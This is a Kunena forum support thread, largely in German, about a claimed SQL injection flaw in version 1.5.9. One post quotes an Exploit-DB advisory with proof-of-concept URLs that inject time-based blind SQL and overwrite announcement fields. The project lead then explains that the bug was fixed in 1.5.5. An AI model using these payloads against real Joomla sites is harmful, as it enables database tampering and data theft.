×
Kunena 5.2 Beta 1 Released (24 Sep 2020)

The Kunena team is thrilled to announce the first public beta release of Kunena 5.2, a native Joomla extension for Joomla 3.9. This is a development release and should be only be used for testing; this version is not recommended for live websites at this stage.

The purpose of this release is to encourage testing by downloading, installing and identifying any problems or shortcomings that people may discover. K 5.2.0 B1 is stable and we are aware that people will discover defects. We encourage you to use the forum to report defects, as soon as they are discovered, so that the development team can work through the problems before the release of K 5.1 as a stable product. Reporting defects does not mean that the problems can or will be fixed. The Kunena team is looking forward to hearing your feedback on how well we have achieved our design goals.

× Themen, die in diesen Bereich verschoben wurden, gelten allgemein als beendet. Falls es dazu noch zusätzliche Fragen gibt, können diese gestellt werden.
Aber diese alten Themen sollten auf keinen Fall wieder auferstehen, um neue Probleme zu erörtern. Eröffnet dazu bitte ein eigenes neues Thema.

Question [erledigt] Sicherheitsproblem in der neuen 1.5.9 Version ! ?

More
10 years 7 months ago - 10 years 7 months ago #1 by C.A.M
Hallo Kunenacommunity,

leider wurde ich heute im Joomlaportal.de auf eine Sicherheitslücke in der neuen Kunenaversion 1.5.9 aufmerksam gemacht ! :woohoo:

Was soll nun getan werden ?

Im Joomlaportalchat, wurde mir geraten das Forum zu Deaktivieren ! ? :S

Zur Zeit sichere ich gerade alles um eventuell die Version 1.5.8 wieder zu Instalieren!

Den Bericht könnt Ihr euch HIER einmal ansehen.

MfG, C.A.M .
Last edit: 10 years 7 months ago by rich.

Please Log in or Create an account to join the conversation.

More
10 years 7 months ago #2 by Hurr1c4n3

Please Log in or Create an account to join the conversation.

More
10 years 7 months ago #3 by peripsum
autsch und das nachdem ich heut nacht geupdatet habe :(

Please Log in or Create an account to join the conversation.

More
10 years 7 months ago #4 by LittleJohn
This is relevant for all of kunena.
Can we maybe do this thread in english?

Please Log in or Create an account to join the conversation.

More
10 years 7 months ago #5 by helmchen

# Title: Joomla Component com_kunena Blind SQL Injection Vulnerability
# EDB-ID: 11279
# CVE-ID: ()
# OSVDB-ID: ()
# Author: B-HUNT3|2
# Published: 2010-01-28
# Verified: no
# Download Exploit Code
# Download N/A

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (com_kunena) BLIND SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var do is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.5.9 but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> https://[HOST]/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=[SQL]

[~]>> {RETURN TRUE::RETURN FALSE} ---> VIEW TIME RESPONSE ||| HIGH: TRUE ||| LOW: FALSE

[~]>> https://server/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=5,benchmark(999999,md5(@@version)),1)/*
[~]>> https://server/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=4,benchmark(999999,md5(@@version)),1)/*

[~]>> Note: There are more affected vars.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...


www.exploit-db.com/exploits/11279

Please Log in or Create an account to join the conversation.

More
10 years 7 months ago #6 by C.A.M
Kann jemand mal BITTE diesen Buchstabensalat übersetzen. :S

Was ist da genau das Problem und wie soll nun vorgegangen werden?

Der eine meint das man besser das Forum Deaktivieren sollte, ein ander meint das es besser währe das Forum zu Deinstallieren und wieder ein anderer meint, Dont Panick !

Bei Sicherheits Geschichten gerate ich jedoch sehr schnell in Panik, auch wenn meine Seite noch nicht so viele Besucher täglich hat wie ich es gerne hätte, heist das ja noch lange nicht das es mich bei meinem Glück nicht treffen könnte. :blink:

Ich habe mein Forum erst einmal bis auf weiteres nur Deaktiviert, weil es bei einer Deinstallation meine Seite in eine Fehlermeldung vewandelt. Weshalb das so ist weis ich noch nicht. :woohoo:

MfG, C.A.M .

Please Log in or Create an account to join the conversation.

More
10 years 7 months ago - 10 years 7 months ago #7 by fxstein
Hallo allerseits!

Wir sind gestern auf die vermeidliche Sicherheitsluecke aufmerksam gemacht worden.

Innerhalb von 2-3 Stunden haben wir 1.5.4 , 1.5.5, 1.5.6, 1.5.7, 1.5.8 & 1.5.9 gestsest.

Alle offiziellen Kunena versionen seit 1.5.5 haben den fix eingebaut. Wir haben sogar kunena.com mit der Attacke getestet.

Die Attacke funktioniert nur gegen alter Kunena 1.5.4 (und aelter aber wirklich gegen ALLE Fireboard Versionen).

Wir haben diesen Bug vor Monaten gefixed und mit 1.5.5 ausgeliefert.

1.5.9 hat dieses problem nicht.

Wir haben umgehend den Author des Alerts als auch packetstorm von diesen Fakten informiert, aber leider von niemandem eine Antwort bekommen.



Hi everybody,

We were made aware of this alleged security vulnerability within a few hours of it hitting packetstorm.

Within 2-3 hours we tested 1.5.4, 1.5.5, 1.5.6, 1.5.7, 1.5.8 and 1.5.9.

Every official distribution since 1.5.5 has the fix built in. We even ran the attack against kunena.com itself.

The vulnerability is only present in versions of Kunena 1.5.4 (and older and ALL versions of Fireboard)

We have fixed this old Fireboard issue months ago.

We immediately contacted the author of the alert as well as packetstorm but have not gotten a response from either one.


fxstein
Kunena project lead

We love stars on the Joomla Extension Directory . :-)
Last edit: 10 years 7 months ago by fxstein.

Please Log in or Create an account to join the conversation.

More
10 years 7 months ago #8 by C.A.M
Hallo fxstein,

das freut mich das dies ein Fehlalarm gewesen ist ! :P

Da dies ja nun geklärt ist, können wir ja alle unser Forum wieder aktivieren und heute Abend wieder ruhig schlafen gehen. ;)

Dennoch würde ich gerne wissen, was das für ein Fehler ist und was im schlimmsten Fall hätte passieren können.

VIELEN dank für die schnelle Entwarnung !

MfG, C.A.M .

Please Log in or Create an account to join the conversation.

  • Not Allowed: to create new topic.
  • Not Allowed: to reply.
  • Not Allowed: to edit your message.
Time to create page: 0.096 seconds